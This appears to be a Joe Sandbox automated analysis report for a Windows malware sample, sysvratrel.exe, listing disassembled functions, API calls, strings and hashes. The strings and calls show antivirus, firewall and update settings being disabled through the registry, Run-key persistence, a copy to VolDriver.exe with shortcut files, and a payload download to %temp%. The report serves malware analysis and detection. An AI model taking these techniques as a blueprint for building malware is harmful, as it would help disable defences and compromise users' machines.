25->4 29 4076fc-407734 wcslen RegSetValueExW RegCloseKey 25->29 26->11 27->28 30 407ab0-407b90 RegSetValueExA * 7 RegCloseKey 28->30 31 407b96-407bab Sleep call 40ca10 28->31 29->4 30->31 34 407d20-407d29 31->34 35 407bb1-407d1d WSAStartup wsprintfW * 2 CreateThread Sleep CreateThread Sleep CreateThread Sleep call 405b60 call 40d880 call 406f50 CreateEventA call 40c140 call 40d370 call 40b500 call 40d3a0 * 4 call 40d510 call 40d650 31->35 35->34
                                                                          APIs
                                                                          • Sleep.KERNELBASE(000007D0), ref: 004074DE
                                                                          • CreateMutexA.KERNELBASE(00000000,00000000,ax765638x6xa), ref: 004074ED
                                                                          • GetLastError.KERNEL32 ref: 004074F9
                                                                          • ExitProcess.KERNEL32 ref: 00407508
                                                                          • GetModuleFileNameW.KERNEL32(00000000,00417280,00000105), ref: 00407542
                                                                          • PathFindFileNameW.SHLWAPI(00417280), ref: 0040754D
                                                                          • wsprintfW.USER32 ref: 0040756A
                                                                          • DeleteFileW.KERNEL32(?), ref: 0040757A
                                                                          • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 00407591
                                                                          • wcscmp.NTDLL ref: 004075A3
                                                                          • ExitProcess.KERNEL32 ref: 004075C2
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$ExitNameProcess$CreateDeleteEnvironmentErrorExpandFindLastModuleMutexPathSleepStringswcscmpwsprintf
                                                                          • String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\tbtcmds.dat$%s\tbtnds.dat$%userprofile%$%windir%$AntiSpywareOverride$AntiSpywareOverride$AntiVirusDisableNotify$AntiVirusDisableNotify$AntiVirusOverride$AntiVirusOverride$CheckedValue$FirewallDisableNotify$FirewallDisableNotify$FirewallOverride$FirewallOverride$NoAutoUpdate$NoAutoUpdate$SOFTWARE\Microsoft\Security Center$SOFTWARE\Microsoft\Security Center\Svc$SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Folder\Hidden\SHOWALL$SOFTWARE\Policies\Microsoft\Windows$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU$SYSTEM\CurrentControlSet\Services\BITS$SYSTEM\CurrentControlSet\Services\wuauserv$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Start$Start$UpdatesDisableNotify$UpdatesDisableNotify$UpdatesOverride$UpdatesOverride$Windows Settings$WindowsUpdate$ax765638x6xa$sysvratrel.exe
                                                                          • API String ID: 4172876685-1985754541
                                                                          • Opcode ID: 02b0754e67c3a5fcf2013b17b005cb8467541e175cb8f0ff015428280e5330c7
                                                                          • Instruction ID: 01c652a6eea3614599500b2dbdc2b26867472a33c88adbc755e5585b16fefd61
                                                                          • Opcode Fuzzy Hash: 02b0754e67c3a5fcf2013b17b005cb8467541e175cb8f0ff015428280e5330c7
                                                                          • Instruction Fuzzy Hash: 582275B1B80318BBE7209B90DC4AFE97775AB4CB05F5080A9B305BA1D1D6F4A984CF5D
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 406 406650-406665 _chkstk 407 406667-406669 406->407 408 40666e-406720 wsprintfW * 5 PathFileExistsW 406->408 409 406b25-406b28 407->409 410 406722-406743 call 40e9b0 408->410 411 406764-406773 PathFileExistsW 408->411 410->411 424 406745-40675e SetFileAttributesW DeleteFileW 410->424 413 4067e0-4067ef PathFileExistsW 411->413 414 406775-406784 PathFileExistsW 411->414 417 4067f1-4067f7 413->417 418 406836-406857 FindFirstFileW 413->418 415 406786-406797 CreateDirectoryW 414->415 416 4067a8-4067b7 PathFileExistsW 414->416 415->416 420 406799-4067a2 SetFileAttributesW 415->420 416->413 421 4067b9-4067cf CopyFileW 416->421 422 406811-406824 call 406400 417->422 423 4067f9-40680f call 406400 417->423 425 40685d-406915 418->425 426 406b1f 418->426 420->416 421->413 428 4067d1-4067da SetFileAttributesW 421->428 437 406827-406830 SetFileAttributesW 422->437 423->437 424->411 427 40691f-406933 lstrcmpW 425->427 426->409 431 406935-406949 lstrcmpW 427->431 432 40694b 427->432 428->413 431->432 435 406950-406961 431->435 436 406af6-406b0c FindNextFileW 432->436 438 406972-406979 435->438 436->427 439 406b12-406b19 FindClose 436->439 437->418 440 4069a7-4069b0 438->440 441 40697b-406998 lstrcmpiW 438->441 439->426 444 4069b2 440->444 445 4069b7-4069c8 440->445 442 40699a 441->442 443 40699c-4069a3 441->443 442->438 443->440 444->436 447 4069d9-4069e0 445->447 448 4069ca-4069d3 445->448 449 406a50-406a59 447->449 450 4069e2-4069ff PathMatchSpecW 447->450 448->447 453 406a60-406a6f PathFileExistsW 449->453 454 406a5b 449->454 451 406a01 450->451 452 406a03-406a49 wsprintfW SetFileAttributesW DeleteFileW 450->452 451->448 452->449 455 406a71 453->455 456 406a76-406ac6 wsprintfW * 2 453->456 454->436 455->436 457 406ae0-406af0 MoveFileExW 456->457 458 406ac8-406ade call 406510 456->458 457->436 458->436
                                                                          APIs
                                                                          • _chkstk.NTDLL(?,00406CA0,?,?,?), ref: 00406658
                                                                          • wsprintfW.USER32 ref: 0040668F
                                                                          • wsprintfW.USER32 ref: 004066AF
                                                                          • wsprintfW.USER32 ref: 004066CF
                                                                          • wsprintfW.USER32 ref: 004066EF
                                                                          • wsprintfW.USER32 ref: 00406708
                                                                          • PathFileExistsW.SHLWAPI(?), ref: 00406718
                                                                          • SetFileAttributesW.KERNEL32(?,00000080), ref: 00406751
                                                                          • DeleteFileW.KERNEL32(?), ref: 0040675E
                                                                          • PathFileExistsW.SHLWAPI(?), ref: 0040676B
                                                                          • PathFileExistsW.SHLWAPI(?), ref: 0040677C
                                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 0040678F
                                                                          • SetFileAttributesW.KERNEL32(?,00000002), ref: 004067A2
                                                                          • PathFileExistsW.SHLWAPI(?), ref: 004067AF
                                                                          • CopyFileW.KERNEL32(00416C68,?,00000000), ref: 004067C7
                                                                          • SetFileAttributesW.KERNEL32(?,00000002), ref: 004067DA
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: File$wsprintf$ExistsPath$Attributes$CopyCreateDeleteDirectory_chkstk
                                                                          • String ID: %s.lnk$%s\%s$%s\%s$%s\%s$%s\%s$%s\%s\%s$%s\%s\VolDriver.exe$%s\*$shell32.dll$shell32.dll
                                                                          • API String ID: 3833403615-1812021906
                                                                          • Opcode ID: 51569e4564f7ad71e9d56f202160bdb96e67f6a8183d4c5cf6e4c163dce801ad
                                                                          • Instruction ID: e2ecd58a7cdb3ddabc66963e241761916e5e8b01b4df26f84105cefa3cc8d735
                                                                          • Opcode Fuzzy Hash: 51569e4564f7ad71e9d56f202160bdb96e67f6a8183d4c5cf6e4c163dce801ad
                                                                          • Instruction Fuzzy Hash: 33D17475900258ABCB20DF60DD44FEA77B8BB48704F00C5E9F20AA6191D7B99BD4CF59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 667 406510-40655f CreateDirectoryW wsprintfW FindFirstFileW 668 406565-406579 lstrcmpW 667->668 669 40663f-406642 667->669 670 406591 668->670 671 40657b-40658f lstrcmpW 668->671 673 40660c-406622 FindNextFileW 670->673 671->670 672 406593-4065dc wsprintfW * 2 671->672 675 4065f6-406606 MoveFileExW 672->675 676 4065de-4065f4 call 406510 672->676 673->668 674 406628-406639 FindClose RemoveDirectoryW 673->674 674->669 675->673 676->673
                                                                          APIs
                                                                          • CreateDirectoryW.KERNEL32(00406ADB,00000000), ref: 0040651F
                                                                          • wsprintfW.USER32 ref: 00406535
                                                                          • FindFirstFileW.KERNEL32(?,?), ref: 0040654C
                                                                          • lstrcmpW.KERNEL32(?,00410FEC), ref: 00406571
                                                                          • lstrcmpW.KERNEL32(?,00410FF0), ref: 00406587
                                                                          • wsprintfW.USER32 ref: 004065AA
                                                                          • wsprintfW.USER32 ref: 004065CA
                                                                          • MoveFileExW.KERNEL32(?,?,00000009), ref: 00406606
                                                                          • FindNextFileW.KERNEL32(000000FF,?), ref: 0040661A
                                                                          • FindClose.KERNEL32(000000FF), ref: 0040662F
                                                                          • RemoveDirectoryW.KERNEL32(?), ref: 00406639
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: FileFindwsprintf$Directorylstrcmp$CloseCreateFirstMoveNextRemove
                                                                          • String ID: %s\%s$%s\%s$%s\*
                                                                          • API String ID: 92872011-445461498
                                                                          • Opcode ID: fff228176ed4e70ddfe54118d53eb9c7a4e211142d687289bb598ae5de3d6162
                                                                          • Instruction ID: 675ada4a5424986e6cd9ec47b4399dcfcf89a647db31862166f89cf1cb76b4cd
                                                                          • Opcode Fuzzy Hash: fff228176ed4e70ddfe54118d53eb9c7a4e211142d687289bb598ae5de3d6162
                                                                          • Instruction Fuzzy Hash: E33178B5900218AFCB10DB60EC89FDA7778AB48301F00C5A9F609A3185DB75DAD9CF68
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetSystemInfo.KERNEL32(?,?), ref: 00402043
                                                                          • InitializeCriticalSection.KERNEL32(00000020), ref: 00402057
                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 00402065
                                                                          • CreateIoCompletionPort.KERNEL32(000000FF,00000000,00000000,00000000), ref: 0040207E
                                                                            • Part of subcall function 0040D370: InitializeCriticalSection.KERNEL32(-00000004), ref: 0040D38E
                                                                          • WSASocketA.WS2_32(00000002,00000001,00000006,00000000,00000000,00000001), ref: 004020AB
                                                                          • setsockopt.WS2_32 ref: 004020D1
                                                                          • htons.WS2_32(?), ref: 00402101
                                                                          • bind.WS2_32(?,0000FFFF,00000010), ref: 00402117
                                                                          • listen.WS2_32(?,7FFFFFFF), ref: 0040212F
                                                                          • WSACreateEvent.WS2_32 ref: 0040213A
                                                                          • WSAEventSelect.WS2_32(?,00000000,00000008), ref: 0040214E
                                                                            • Part of subcall function 0040D3A0: EnterCriticalSection.KERNEL32(-00000004,00000000), ref: 0040D3C4
                                                                            • Part of subcall function 0040D3A0: CreateThread.KERNEL32(00000000,?,00000000,?,00000000,?), ref: 0040D41F
                                                                            • Part of subcall function 0040D3A0: GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002), ref: 0040D45C
                                                                            • Part of subcall function 0040D3A0: GetCurrentProcess.KERNEL32(00000000,00000000), ref: 0040D467
                                                                            • Part of subcall function 0040D3A0: DuplicateHandle.KERNEL32(00000000), ref: 0040D46E
                                                                            • Part of subcall function 0040D3A0: LeaveCriticalSection.KERNEL32(-00000004), ref: 0040D482
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateCriticalSection$Event$CurrentInitializeProcess$CompletionDuplicateEnterHandleInfoLeavePortSelectSocketSystemThreadbindhtonslistensetsockopt
                                                                          • String ID:
                                                                          • API String ID: 1603358586-0
                                                                          • Opcode ID: b2767913dbff73aead5f37bed1db4460b85de11d1e323851ce2d567b138c49de
                                                                          • Instruction ID: df8ad55f307143f3a92c653802a821764c0c55d7be8f2a3f3e8fe1ebc27bb844
                                                                          • Opcode Fuzzy Hash: b2767913dbff73aead5f37bed1db4460b85de11d1e323851ce2d567b138c49de
                                                                          • Instruction Fuzzy Hash: 3F41AF70640701ABD3309F649D0AF4B77E4AF44720F108A2DF6A9EA6D4E7F4E845875A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • socket.WS2_32(00000002,00000002,00000011), ref: 0040D96A
                                                                          • htons.WS2_32(0000076C), ref: 0040D9A0
                                                                          • inet_addr.WS2_32(239.255.255.250), ref: 0040D9AF
                                                                          • setsockopt.WS2_32(000000FF,0000FFFF,00000020,00000001,00000001), ref: 0040D9CD
                                                                            • Part of subcall function 0040ACC0: htons.WS2_32(00000050), ref: 0040ACED
                                                                            • Part of subcall function 0040ACC0: socket.WS2_32(00000002,00000001,00000000), ref: 0040AD0D
                                                                            • Part of subcall function 0040ACC0: connect.WS2_32(000000FF,?,00000010), ref: 0040AD26
                                                                            • Part of subcall function 0040ACC0: getsockname.WS2_32(000000FF,?,00000010), ref: 0040AD58
                                                                          • bind.WS2_32(000000FF,?,00000010), ref: 0040DA03
                                                                          • lstrlenA.KERNEL32(00411A90,00000000,?,00000010), ref: 0040DA1C
                                                                          • sendto.WS2_32(000000FF,00411A90,00000000), ref: 0040DA2B
                                                                          • ioctlsocket.WS2_32(000000FF,8004667E,00000001), ref: 0040DA45
                                                                            • Part of subcall function 0040DAD0: recvfrom.WS2_32(000000FF,?,00000400,00000000,00000000,00000000), ref: 0040DB1E
                                                                            • Part of subcall function 0040DAD0: Sleep.KERNEL32(000003E8), ref: 0040DB2E
                                                                            • Part of subcall function 0040DAD0: StrCmpNIA.SHLWAPI(?,HTTP/1.1 200 OK,0000000F), ref: 0040DB4B
                                                                            • Part of subcall function 0040DAD0: StrStrIA.SHLWAPI(?,LOCATION: ), ref: 0040DB61
                                                                            • Part of subcall function 0040DAD0: StrChrA.SHLWAPI(?,0000000D), ref: 0040DB8E
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: htonssocket$Sleepbindconnectgetsocknameinet_addrioctlsocketlstrlenrecvfromsendtosetsockopt
                                                                          • String ID: 239.255.255.250
                                                                          • API String ID: 726339449-2186272203
                                                                          • Opcode ID: c5df8ff4d2bf678dd4bdd472d0aab4cd1671d576250975767815a1ad79b200db
                                                                          • Instruction ID: 776be564c15d3a67ad3e8e206458624d982b0507424591c965b87a75806c6374
                                                                          • Opcode Fuzzy Hash: c5df8ff4d2bf678dd4bdd472d0aab4cd1671d576250975767815a1ad79b200db
                                                                          • Instruction Fuzzy Hash: 1541E9B4E04208ABDB14DFE4D889BEEBBB5AF48304F108169E505B7390E7B55A44CB59
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 004014B2
                                                                          • socket.WS2_32(00000002,00000002,00000011), ref: 004014C1
                                                                          • htons.WS2_32(?), ref: 00401508
                                                                          • setsockopt.WS2_32(?,0000FFFF), ref: 0040152A
                                                                          • bind.WS2_32(?,?,00000010), ref: 0040153B
                                                                            • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D79D,00000000), ref: 00401346
                                                                            • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040D79D,00000000), ref: 00401352
                                                                            • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040D79D,00000000), ref: 0040135C
                                                                          • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401569
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindhtonssetsockoptsocket
                                                                          • String ID:
                                                                          • API String ID: 4174406920-0
                                                                          • Opcode ID: e01990b2806d481bb9ed450513fecbcb8920a32bd929df83c4378d56477af31e
                                                                          • Instruction ID: 9f6d7f02e8121356806164c5164031e4b64ed467ed2b657d4572fa9387097a74
                                                                          • Opcode Fuzzy Hash: e01990b2806d481bb9ed450513fecbcb8920a32bd929df83c4378d56477af31e
                                                                          • Instruction Fuzzy Hash: E131C871A44301AFE320DF649C46F9BB6E0AF48B10F40493DF695EB2E0D3B5D544879A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetTickCount.KERNEL32 ref: 0040CF42
                                                                          • ioctlsocket.WS2_32(00000004,4004667F,00000000), ref: 0040CF68
                                                                          • recv.WS2_32(00000004,00002710,000000FF,00000000), ref: 0040CF9F
                                                                          • GetTickCount.KERNEL32 ref: 0040CFB4
                                                                          • Sleep.KERNEL32(00000001), ref: 0040CFD4
                                                                          • GetTickCount.KERNEL32 ref: 0040CFDA
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CountTick$Sleepioctlsocketrecv
                                                                          • String ID:
                                                                          • API String ID: 107502007-0
                                                                          • Opcode ID: 077c42ecd2642622499ea3213999ab9bc2a668583e8a55166bb8840c59880b72
                                                                          • Instruction ID: 1a678e6439685295adbdd864bb1f175a680e3ab9afc47d2c7bf7927640be176d
                                                                          • Opcode Fuzzy Hash: 077c42ecd2642622499ea3213999ab9bc2a668583e8a55166bb8840c59880b72
                                                                          • Instruction Fuzzy Hash: B031FE7490020EEFCF04DFA4D988AEE77B1FF44315F108669E815A72D0D7749A90CB96
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • htons.WS2_32(00000050), ref: 0040ACED
                                                                            • Part of subcall function 0040AC80: inet_addr.WS2_32(0040AD01), ref: 0040AC8A
                                                                            • Part of subcall function 0040AC80: gethostbyname.WS2_32(?), ref: 0040AC9D
                                                                          • socket.WS2_32(00000002,00000001,00000000), ref: 0040AD0D
                                                                          • connect.WS2_32(000000FF,?,00000010), ref: 0040AD26
                                                                          • getsockname.WS2_32(000000FF,?,00000010), ref: 0040AD58
                                                                          Strings
                                                                          • www.update.microsoft.com, xrefs: 0040ACF7
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: connectgethostbynamegetsocknamehtonsinet_addrsocket
                                                                          • String ID: www.update.microsoft.com
                                                                          • API String ID: 4063137541-1705189816
                                                                          • Opcode ID: 5a1d85337c715bac0dcb8e8b8f2ac327c24fa7ec3f03106e8ebc05f0c3c87f0a
                                                                          • Instruction ID: ba3e2b0e6fec23725a126dc2d5d77dfcfe6771dbae9c9e174257d4c79807ff88
                                                                          • Opcode Fuzzy Hash: 5a1d85337c715bac0dcb8e8b8f2ac327c24fa7ec3f03106e8ebc05f0c3c87f0a
                                                                          • Instruction Fuzzy Hash: BA210BB5E103099BDB04DFF8D946AEEBBB5AF08300F108169E515F7390E7745A44CBAA
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CryptAcquireContextW.ADVAPI32(~|@,00000000,00000000,00000001,F0000040,?,?,0040C119,~|@,00000004,?,?,0040C14E,000000FF), ref: 0040C0D3
                                                                          • CryptGenRandom.ADVAPI32(~|@,?,00000000,?,?,0040C119,~|@,00000004,?,?,0040C14E,000000FF), ref: 0040C0E9
                                                                          • CryptReleaseContext.ADVAPI32(~|@,00000000,?,?,0040C119,~|@,00000004,?,?,0040C14E,000000FF), ref: 0040C0F5
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: Crypt$Context$AcquireRandomRelease
                                                                          • String ID: ~|@
                                                                          • API String ID: 1815803762-1417210658
                                                                          • Opcode ID: 115afb25b1a51c25259045811286537a4a8d93f4d7ebd8fa37951325938a193c
                                                                          • Instruction ID: 64b452c5f04e5b6757705d6885a7ff86aea398e2a213dd3f660bad642ac62f97
                                                                          • Opcode Fuzzy Hash: 115afb25b1a51c25259045811286537a4a8d93f4d7ebd8fa37951325938a193c
                                                                          • Instruction Fuzzy Hash: F6E01275654208FBDB24CFD5EC49FDA776CAB48700F108154F709A7190DAB5EA40DBA8
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,?,?,0040D79D,00000000), ref: 004013D5
                                                                          • socket.WS2_32(00000002,00000002,00000011), ref: 004013E4
                                                                          • bind.WS2_32(?,?,00000010), ref: 00401429
                                                                            • Part of subcall function 00401330: SetEvent.KERNEL32(6856006A,00000000,?,0040143A,00000000,?,?,?,0040D79D,00000000), ref: 00401346
                                                                            • Part of subcall function 00401330: WaitForSingleObject.KERNEL32(00401100,000000FF,?,0040143A,00000000,?,?,?,0040D79D,00000000), ref: 00401352
                                                                            • Part of subcall function 00401330: CloseHandle.KERNEL32(00401100,?,0040143A,00000000,?,?,?,0040D79D,00000000), ref: 0040135C
                                                                          • CreateThread.KERNEL32(00000000,00000000,00401100,00000000,00000000,00000000), ref: 00401459
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: CreateEvent$CloseHandleObjectSingleThreadWaitbindsocket
                                                                          • String ID:
                                                                          • API String ID: 3943618503-0
                                                                          • Opcode ID: b639d9fe06152c2b402f412d2fb95bf7c84a2e2683d3c9481316ca8ef9ae7b76
                                                                          • Instruction ID: 53638d0e5b86ff224420f1c7f9a69720ea7b841d4339b56c2ae1fb68745f7462
                                                                          • Opcode Fuzzy Hash: b639d9fe06152c2b402f412d2fb95bf7c84a2e2683d3c9481316ca8ef9ae7b76
                                                                          • Instruction Fuzzy Hash: CA11B974A40710AFE360DF749C0AF877AE0AF04B14F50892DF599E72E1E3F49544878A
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          APIs
                                                                          • GetLocaleInfoA.KERNEL32(00000400,00000007,?,0000000A,?,?,004075B8), ref: 0040E983
                                                                          • strcmp.NTDLL ref: 0040E992
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000005.00000002.2292972194.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000005.00000002.2292953351.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2292991829.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                          • Associated: 00000005.00000002.2293011892.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_5_2_400000_sysvratrel.jbxd
                                                                          Yara matches
                                                                          Similarity
                                                                          • API ID: InfoLocalestrcmp
                                                                          • String ID: UKR
                                                                          • API String ID: 3191669094-64918367
                                                                          • Opcode ID: 1d6965906c99fb0c7d18e61921188abf55c3e63af3ccecffda9c71d66ea34e25
                                                                          • Instruction ID: aa0b77ea91eb2b23b28eec9c342f5ca45138d15d753f47792771d9b4db2dab4a
                                                                          • Opcode Fuzzy Hash: 1d6965906c99fb0c7d18e61921188abf55c3e63af3ccecffda9c71d66ea34e25
                                                                          • Instruction Fuzzy Hash: FEE0C272A4430876DA10A6A1AE03BAA771C5F11701F000076AF04A61C1E9B9962992DB
                                                                          Uniqueness

                                                                          Uniqueness Score: -1.00%

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetTickCount.KERNEL32 ref: 0040ED29
                                                                          • srand.MSVCRT ref: 0040ED30
                                                                          • ExpandEnvironmentStringsW.KERNEL32(%temp%,?,00000104), ref: 0040ED50
                                                                          • strlen.NTDLL ref: 0040ED5A
                                                                          • mbstowcs.NTDLL ref: 0040ED71
                                                                          • rand.MSVCRT ref: 0040ED79
                                                                          • rand.MSVCRT ref: 0040ED8D
                                                                          • wsprintfW.USER32 ref: 0040EDB4
                                                                          • InternetOpenW.WININET(Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36,00000000,00000000,00000000,00000000), ref: 0040EDCA
                                                                          • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0040EDF9
                                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 0040EE28
